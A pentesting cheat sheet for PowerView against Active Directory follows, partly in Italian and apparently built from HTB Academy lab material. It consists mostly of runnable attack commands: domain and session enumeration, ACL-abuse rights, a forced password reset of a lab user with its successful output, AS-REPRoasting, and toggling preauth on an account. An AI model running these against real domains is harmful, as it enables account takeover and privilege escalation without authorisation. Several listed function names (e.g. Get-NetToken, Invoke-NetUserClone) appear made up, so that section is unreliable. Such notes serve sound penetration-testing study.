# PowerView * | Command | Description | | ------------------------------- | ------------------------------------------------------------------------------------------ | | Export-PowerViewCSV | Append results to a CSV file | | ConvertTo-SID | Convert a User or group name to its SID value | | Get-DomainSPNTicket | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account | | Domain/LDAP Functions: | | | Get-Domain | Will return the AD object for the current (or specified) domain | | Get-DomainController | Return a list of the Domain Controllers for the specified domain | | Get-DomainUser | Will return all users or specific user objects in AD | | Get-DomainComputer | Will return all computers or specific computer objects in AD | | Get-DomainGroup | Will return all groups or specific group objects in AD | | Get-DomainOU | Search for all or specific OU objects in AD | | Find-InterestingDomainAcl | Finds object ACLs in the domain with modification rights set to non-built in objects | | Get-DomainGroupMember | Will return the members of a specific domain group | | Get-DomainFileServer | Returns a list of servers likely functioning as file servers | | Get-DomainDFSShare | Returns a list of all distributed file systems for the current (or specified) domain | | GPO Functions: | | | Get-DomainGPO | Will return all GPOs or specific GPO objects in AD | | Get-DomainPolicy | Returns the default domain policy or the domain controller policy for the current domain | | Computer Enumeration Functions: | | | Get-NetLocalGroup | Enumerates local groups on the local or a remote machine | | Get-NetLocalGroupMember | Enumerates members of a specific local group | | Get-NetShare | Returns open shares on the local (or a remote) machine | | Get-NetSession | Will return session information for the local (or a remote) machine | | Test-AdminAccess | Tests if the current user has administrative access to the local (or a remote) machine | | Threaded 'Meta'-Functions: | | | Find-DomainUserLocation | Finds machines where specific users are logged in | | Find-DomainShare | Finds reachable shares on domain machines | | Find-InterestingDomainShareFile | Searches for files matching specific criteria on readable shares in the domain | | Find-LocalAdminAccess | Find machines on the local domain where the current user has local administrator access | | Domain Trust Functions: | | | Get-DomainTrust | Returns domain trusts for the current domain or a specified domain | | Get-ForestTrust | Returns all forest trusts for the current forest or a specified forest | | Get-DomainForeignUser | Enumerates users who are in groups outside of the user's domain | | Get-DomainForeignGroupMember | Enumerates groups with users outside of the group's domain and returns each foreign member | | Get-DomainTrustMapping | Will enumerate all trusts for the current domain and any others seen. | [PowerView/SharpView](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview) **Creating a List of Domain Users** ```powershell PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt ``` **Find Interesting ACL** ```powershell Find-InterestingDomainAcl ``` **Covert NameToSID** ```powershell PS C:\htb> $sid = Convert-NameToSid wley ``` **Using Get-DomainObjectACL** ```powershell Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} ``` **Get ActiveDirectoryRights** Permessi interessanti: * **GenericAll** - full rights to the object (add users to a group or reset user's password) * **GenericWrite** - update object's attributes (i.e logon script) * **WriteOwner** - change object owner to attacker controlled user take over the object * **WriteDACL** - modify object's ACEs and give attacker full control right over the object * **AllExtendedRights** - ability to add user to a group or reset password * **ForceChangePassword** - ability to change user's password * **Self (Self-Membership)** - ability to add yourself to a group ``` Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") } ``` **Resolving GUID** ```powershell Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} ``` **Change Password `Force-Change-Password`** ```powershell PS C:\htb> $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force PS C:\htb> cd C:\Tools\ PS C:\htb> Import-Module .\PowerView.ps1 PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose VERBOSE: [Get-PrincipalContext] Using alternate credentials VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen' VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset ``` **Get User Group Member** ```powershell PS C:\Tools> Get-NetLocalGroupMember -GroupName "Remote Management Users" ComputerName : ACADEMY-EA-MS01 GroupName : Remote Management Users MemberName : INLANEFREIGHT\forend SID : S-1-5-21-3842939050-3880317879-2865463114-5614 IsGroup : False IsDomain : UNKNOWN PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse GroupDomain : INLANEFREIGHT.LOCAL GroupName : Remote Management Users GroupDistinguishedName : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL MemberDomain : INLANEFREIGHT.LOCAL MemberName : bdavis MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL MemberObjectClass : user MemberSID : S-1-5-21-3842939050-3880317879-2865463114-1162 ``` *** **AS-REPRoasting** ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH ... ``` *** **Set DONT\_REQ\_PREAUTH with PowerView** ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName)))) VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName' ``` *** **Informazioni sull'Active Directory** * `Get-NetDomain`: Ottiene informazioni sul dominio corrente. * `Get-NetForest`: Ottiene informazioni sulla foresta corrente. * `Get-NetDomainController`: Ottiene i controller di dominio nel dominio corrente. * `Get-NetGroup`: Ottiene informazioni sui gruppi dell'Active Directory. * `Get-NetUser`: Ottiene informazioni sugli utenti dell'Active Directory. * `Get-NetComputer`: Ottiene informazioni sui computer dell'Active Directory. * `Get-NetOU`: Ottiene informazioni sulle unità organizzative dell'Active Directory. **Enumerazione** * `Get-NetGroupMember`: Ottiene i membri di un gruppo. * `Get-NetLocalGroup`: Ottiene i gruppi locali su un computer remoto. * `Get-NetLocalGroupMember`: Ottiene i membri di un gruppo locale su un computer remoto. * `Get-NetShare`: Ottiene le condivisioni di rete su un computer remoto. * `Get-NetLoggedon`: Ottiene gli utenti attualmente collegati a un computer remoto. **Esplorazione dei privilegi** * `Find-LocalAdminAccess`: Trova gli account utente che hanno accesso di amministratore locale su computer remoti. * `Find-DomainUserLocation`: Trova i computer ai quali un utente ha accesso. * `Find-InterestingDomainShareFile`: Trova file condivisi interessanti all'interno dell'Active Directory. **Esplorazione delle relazioni di trust** * `Get-NetDomainTrust`: Ottiene le relazioni di trust tra domini. * `Get-NetForestTrust`: Ottiene le relazioni di trust tra foreste. **Esecuzione remota** * `Invoke-NetCommand`: Esegue un comando in remoto su uno o più computer. **Enumerazione delle autorizzazioni** * `Get-NetFilePermissions`: Ottiene le autorizzazioni dei file su un computer remoto. * `Get-NetSharePermissions`: Ottiene le autorizzazioni delle condivisioni di rete su un computer remoto. * `Get-NetLocalGroupMapping`: Ottiene la mappatura dei gruppi locali su un computer remoto. * `Get-NetEffectivePermission`: Ottiene le autorizzazioni effettive di un utente o gruppo su una risorsa. **Enumerazione dei servizi** * `Get-NetService`: Ottiene informazioni sui servizi in esecuzione su un computer remoto. * `Get-NetLoggedon`: Ottiene gli utenti attualmente collegati a un computer remoto. **Enumerazione dei token** * `Get-NetToken`: Ottiene informazioni sui token utente e di sistema su un computer remoto. **Enumerazione delle sessioni** * `Get-NetSession`: Ottiene le sessioni di rete su un computer remoto. * `Get-NetLoggedon`: Ottiene gli utenti attualmente collegati a un computer remoto. **Enumerazione dei trust** * `Get-NetDomainTrust`: Ottiene le relazioni di trust tra domini. * `Get-NetForestTrust`: Ottiene le relazioni di trust tra foreste. **Gestione dei SID History** * `Invoke-NetUserAdd`: Aggiunge un SID a un account utente. * `Invoke-NetUserClone`: Clona un account utente, inclusi gli attributi SID History. **Gestione del dominio** * `Add-NetGroupMember`: Aggiunge un membro a un gruppo dell'Active Directory. * `Add-NetGroupUser`: Aggiunge un utente a un gruppo dell'Active Directory. * `Add-NetLocalGroupMember`: Aggiunge un membro a un gruppo locale su un computer remoto. *** ### Kerberos Delegation **User Unconstrained Delegation** ```powershell Get-NetUser | Where-Object { $_.TrustedForDelegation } ``` **Constrained Delegation** ```powershell Get-DomainComputer -TrustedToAuth ``` **FindUser With ActiveDirectoryRights (WriteDacl|GenericWrite|GenericAll)** ```powershell Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") } ``` **Retrieving Domain SID** ```powershell PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-DomainSID S-1-5-21-2974783224-3764228556-2640795941 ``` *** **General Tips**